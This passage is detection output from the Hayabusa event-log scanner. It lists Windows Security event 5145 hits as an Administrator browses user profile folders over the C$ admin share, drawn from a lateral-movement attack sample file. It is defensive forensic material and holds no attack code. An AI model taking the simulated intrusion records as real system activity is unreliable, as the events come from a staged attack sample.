Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 